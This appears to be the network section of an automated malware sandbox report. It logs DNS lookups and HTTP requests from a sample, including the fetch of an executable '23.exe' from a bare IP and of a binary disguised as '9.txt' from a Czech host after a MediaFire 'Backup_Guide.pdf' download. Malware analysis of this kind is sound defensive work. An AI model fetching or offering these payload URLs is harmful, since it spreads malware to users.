Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| www.mediafire.com | 104.16.114.74 | |
| download2268.mediafire.com | 199.91.155.9 | |
| poslisoubor.cz | 109.71.208.62 |
GET
302
https://www.mediafire.com/file_premium/p3wr1k36iwfjl7y/Backup_Guide.pdf/file
REQUEST
RESPONSE
BODY
GET /file_premium/p3wr1k36iwfjl7y/Backup_Guide.pdf/file HTTP/1.1
Host: www.mediafire.com
Connection: Keep-Alive
HTTP/1.1 302 Found
Date: Wed, 31 Jul 2024 05:51:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://download2268.mediafire.com/qr8luj1fzd8g3bv6nW_vkbNN9U37OPJucvRpMXA0C6yRMV6EbEL93xnS6_bBqtWIJ1r_YIUyjbf885Lty7TTdZKxLPjY_47Esi_qASx-8jpkWh0DrFmCBI6QdOtIloYrqM3AbEKf2rsqaqQNWGiVZ07UGsUVojVAlKJAO1KmHndKPcM/p3wr1k36iwfjl7y/Backup_Guide.pdf
CF-Ray: 8abb50c7fb5e687d-NRT
CF-Cache-Status: DYNAMIC
Access-Control-Allow-Origin: https://www.mediafire.com
Set-Cookie: ukey=qmqtoe12nqclwar0cfa4c0q8ca6gldh7; expires=Sun, 31-Jul-2044 05:51:15 GMT; Max-Age=631152000; path=/; domain=.mediafire.com; HttpOnly
Strict-Transport-Security: max-age=0
access-control-allow-methods: OPTIONS, POST, GET
alt-svc: h3=":443"; ma=86400
x-mf-env: liveApi
x-mf-fe: mf1
Set-Cookie: __cf_bm=R6adTGw2Envba86_PzieY6y86L_1bCbvIjWFn10GDWs-1722405075-1.0.1.1-HGZjCYNlArNdUXeIR9qIPVh5qkFz6T2h5.sr52pdJ.3_fGcvF.rmT6QJpA3hF3AsTxpfCksn.ci1YBjHn.4JCg; path=/; expires=Wed, 31-Jul-24 06:21:15 GMT; domain=.mediafire.com; HttpOnly; Secure
Server: cloudflare
GET
200
http://94.154.172.166/rwrv/23.exe
REQUEST
RESPONSE
BODY
GET /rwrv/23.exe HTTP/1.1
Host: 94.154.172.166
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 05:51:17 GMT
Server: Apache/2.4.38 (Debian)
Last-Modified: Tue, 30 Jul 2024 13:22:09 GMT
ETag: "7000-61e76dd5ebed3"
Accept-Ranges: bytes
Content-Length: 28672
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET
200
http://poslisoubor.cz/gf.php?33f6c54a9a525e2c37453931c2aadebe/9.txt
REQUEST
RESPONSE
BODY
GET /gf.php?33f6c54a9a525e2c37453931c2aadebe/9.txt HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: poslisoubor.cz
HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 05:51:03 GMT
Server: Apache/2.4.38 (Debian)
X-Powered-By: PHP/5.6.40-0+deb8u5
Content-Disposition: attachment; filename="9.txt"
Content-Transfer-Encoding: binary
Content-Length: 494592
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/download
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLSv1 192.168.56.103:49164 104.16.114.74:443 |
C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Organization Validation Secure Server CA | C=US, ST=Texas, O=MEDIAFIRE, LLC, CN=*.mediafire.com | 8b:fa:81:04:17:18:84:c4:3e:8e:d5:89:ad:d6:5d:bd:9a:df:84:da |
Snort Alerts
No Snort Alerts